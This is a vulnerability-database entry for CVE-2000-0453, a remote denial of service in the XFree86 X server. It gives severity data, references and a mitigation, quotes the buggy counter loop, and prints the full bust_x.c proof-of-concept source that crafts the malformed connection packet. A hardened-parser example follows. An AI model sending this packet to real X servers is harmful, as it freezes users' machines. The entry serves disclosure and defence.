CVE-2000-0453
CVSS 5.0
Published: 2000-05-18 00:00:00
Last modified: 2008-09-10 15:04:42

[Original] XFree86 3.3.x and 4.0 allows a user to cause a denial of service via a negative counter value in a malformed TCP packet that is sent to port 6000.


[CNNVD] XFree86 Xserver denial of service vulnerability (CNNVD-200005-074)

        XFree86 3.3.x and 4.0 are affected. A remote attacker can cause a denial of service via a negative counter value in a malformed TCP packet sent to port 6000.

- CVSS (base score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: NONE [no impact on system confidentiality]
Integrity impact: NONE [no impact on system integrity]
Availability impact: PARTIAL [may degrade performance or interrupt access to resources]
Access complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [no authentication required to exploit]

- CPE (affected platforms and products)

cpe:/a:xfree86_project:x11r6:4.0
cpe:/a:xfree86_project:x11r6:3.3.5
cpe:/a:xfree86_project:x11r6:3.3.6

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0453
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0453
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200005-074
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/1235
(UNKNOWN)  BID  1235
http://archives.neohapsis.com/archives/bugtraq/2000-05/0223.html
(UNKNOWN)  BUGTRAQ  20000518 Nasty XFree Xserver DoS
ftp://ftp.caldera.com/pub/security/OpenLinux/CSSA-2000-012.0.txt
(UNKNOWN)  CALDERA  CSSA-2000-012.0

- Vulnerability information

XFree86 Xserver denial of service vulnerability
Medium severity; boundary condition error
Published 2000-05-18 00:00:00; updated 2005-05-02 00:00:00
Remote
        XFree86 3.3.x and 4.0 are affected. A remote attacker can cause a denial of service via a negative counter value in a malformed TCP packet sent to port 6000.

- Advisories and patches

        Solution submitted by Fred Silva:
        Run the X server with the option "-nolisten tcp" set. This option causes the X server not to listen for connections from any client. To use this option, simply add it to the serverargs variable in the /usr/X11/bin/startx script.
        FreeBSD has released fixes for this vulnerability.
        Fixed version: XFree86 X11R6 3.3.6

- Vulnerability information (19950)

XFree86 X11R6 3.3.5/3.3.6/4.0 Xserver Denial of Service Vulnerability (EDBID:19950)
Platform: linux; Type: dos
Date: 2000-05-18; Verified
Author: Chris Evans
source: http://www.securityfocus.com/bid/1235/info

A denial of service exists in XFree86 3.3.5, 3.3.6 and 4.0. A remote user can send a malformed packet to the TCP listening port, 6000, which will cause the X server to be unresponsive for some period of time. During this time, the keyboard will not respond to user input, and in some cases, the mouse will also not respond. During this time period, the X server will utilize 100% of the CPU, and can only be repaired by being signaled. This vulnerability exists only in servers compiled with the XCSECURITY #define set. This can be verified by running the following:
strings /path/to/XF86_SVGA | grep "XC-QUERY-SECURITY-1"

To quote the Bugtraq post, by Chris Evans <chris@ferret.lmh.ox.ac.uk>:
"Observe xc/programs/Xserver/os/secauth.c, AuthCheckSitePolicy():

// dataP is user supplied data from the network
char *policy = *dataP;
int nPolicies;
...
// Oh dear, we can set nPolicies to -1
nPolicies = *policy++;
while (nPolicies) {
// Do some stuff in a loop
...
nPolicies--;
}

So, the counter "nPolicies", if seeded with -1, will decrement towards
about minus 2 billion, then wrap to become positive 2 billion, and head
towards its final destination of 0." 

/* bust_x.c
 * Demonstration purposes only!
 * Chris Evans <chris@scary.beasts.org>
 *
 * Writes a raw X11 connection-setup request to stdout: a little-endian
 * header naming the "XC-QUERY-SECURITY-1" authorization protocol, followed
 * by site-policy auth data whose policy count byte is -1.
 */
#include <string.h>
#include <unistd.h>

int
main(int argc, const char* argv[])
{
  char bigbuf[201];
  short s;
  char c;

  (void)argc;
  (void)argv;

  c = -120;

  /* Fill the policy-string area with a negative length byte repeated */
  memset(bigbuf, c, sizeof(bigbuf));

  /* Little endian */
  c = 'l';
  write(1, &c, 1);
  /* PAD */
  c = 0;
  write(1, &c, 1);
  /* Major */
  s = 11;
  write(1, &s, 2);
  /* Minor */
  s = 0;
  write(1, &s, 2);
  /* Auth proto len */
  s = 19;
  write(1, &s, 2);
  /* Auth string len */
  s = 200;
  write(1, &s, 2);

  /* PAD */
  s = 0;
  write(1, &s, 2);

  /* Auth name */
  write(1, "XC-QUERY-SECURITY-1", 19);

  /* byte to round to multiple of 4 */
  c = 0;
  write(1, &c, 1);

  /* Auth data */
  /* Site policy please */
  c = 2;
  write(1, &c, 1);
  /* "permit" - doesn't really matter */
  c = 0;
  write(1, &c, 1);
  /* number of policies: -1, loop you sucker:) */
  c = -1;
  write(1, &c, 1);
  /* Negative stringlen.. 201 of them just in case, chortle... */

  write(1, bigbuf, sizeof(bigbuf));

  return 0;
}

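The counter bug quoted from the Bugtraq post and the auth data bust_x.c emits, as an added example that is not part of the original post or of XFree86's code: the first function mirrors how the vulnerable assignment `nPolicies = *policy++` seeds the loop counter when `char` is signed (as on x86), and the second parses the same XC-QUERY-SECURITY-1 site-policy data with unsigned widths and a remaining-bytes check before every read, so the exploit's 0xff count and 0x88 lengths are rejected instead of driving a 4-billion-iteration loop. The byte layout (type 2, permit flag, count, then length-prefixed strings) is taken from bust_x.c; the function names, error codes and the sample inputs are this example's own assumptions, not XFree86's API.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Result codes for the hardened parser (this example's own, not XFree86's). */
enum { SP_ERR_SHORT = -1, SP_ERR_TYPE = -2, SP_ERR_TRUNC = -3 };

/* Mirrors the vulnerable seeding `nPolicies = *policy++` with `char *policy`
 * on x86, where plain char is signed: 0xff reads as -1, 0x88 as -120.
 * Returns the value the server's loop counter would start from. */
int vulnerable_count(const unsigned char *data, size_t len)
{
    const signed char *policy = (const signed char *)data;
    if (len < 3)
        return 0;
    return policy[2];   /* byte 0: request type, byte 1: permit flag, byte 2: count */
}

/* Hardened parse of the same data: unsigned widths, and every read checked
 * against the bytes actually received, so the loop is bounded by the buffer.
 * Returns the number of policy strings (0..255) or a negative SP_ERR_*. */
int parse_site_policy(const unsigned char *data, size_t len)
{
    size_t off = 0;
    unsigned npolicies, i;

    if (len < 3)
        return SP_ERR_SHORT;
    if (data[off++] != 2)           /* 2 = site policy request, as in bust_x.c */
        return SP_ERR_TYPE;
    off++;                          /* permit/deny flag; irrelevant to bounds */
    npolicies = data[off++];        /* unsigned: can never be negative */

    for (i = 0; i < npolicies; i++) {
        unsigned plen;
        if (off >= len)             /* count promises more entries than bytes */
            return SP_ERR_TRUNC;
        plen = data[off++];
        if (len - off < plen)       /* string would run past the buffer */
            return SP_ERR_TRUNC;
        off += plen;
    }
    return (int)npolicies;
}

/* Constructed input: the 204 auth-data bytes bust_x.c writes. */
size_t build_exploit_auth_data(unsigned char *out, size_t cap)
{
    const size_t n = 3 + 201;
    if (cap < n)
        return 0;
    out[0] = 2;                     /* site policy */
    out[1] = 0;                     /* "permit" */
    out[2] = 0xff;                  /* nPolicies: -1 through a signed char */
    memset(out + 3, 0x88, 201);     /* -120 as signed: "negative" string lengths */
    return n;
}

/* Constructed input: one well-formed policy string, "default". */
size_t build_valid_auth_data(unsigned char *out, size_t cap)
{
    static const unsigned char pkt[] = { 2, 0, 1, 7, 'd', 'e', 'f', 'a', 'u', 'l', 't' };
    if (cap < sizeof pkt)
        return 0;
    memcpy(out, pkt, sizeof pkt);
    return sizeof pkt;
}

/* Wrappers that run each constructed input through both interpretations. */
int exploit_seed_vulnerable(void)
{
    unsigned char b[256];
    return vulnerable_count(b, build_exploit_auth_data(b, sizeof b));
}
int exploit_result_hardened(void)
{
    unsigned char b[256];
    return parse_site_policy(b, build_exploit_auth_data(b, sizeof b));
}
int valid_result_hardened(void)
{
    unsigned char b[256];
    return parse_site_policy(b, build_valid_auth_data(b, sizeof b));
}

int main(void)
{
    printf("exploit data: vulnerable loop seed = %d (decrements through INT_MIN, as the advisory describes)\n",
           exploit_seed_vulnerable());
    printf("exploit data: hardened parser      = %d (SP_ERR_TRUNC)\n",
           exploit_result_hardened());
    printf("valid data:   hardened parser      = %d policy string(s)\n",
           valid_result_hardened());
    return 0;
}
```

The two properties that matter are visible in the loop: the count and each length are read through `unsigned char`, so no byte can ever be negative, and the remaining length is compared against each read before the offset moves, so a count that promises more entries than the client sent ends the parse with an error rather than with the server pegged at 100% CPU.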

- Vulnerability information

OSVDB ID: 1345
XFree86 Negative Counter Value TCP Packet DoS
Remote / Network Access; Denial of Service
Impact: Loss of Availability; Solution: Unknown
Exploit: Public; Third-party Verified

- Vulnerability description

- Timeline

Disclosed 2000-05-18; other dates unknown

- Solution

OSVDB is not aware of a solution for this vulnerability.

- References

- Credit

Unknown or Incomplete
 

 
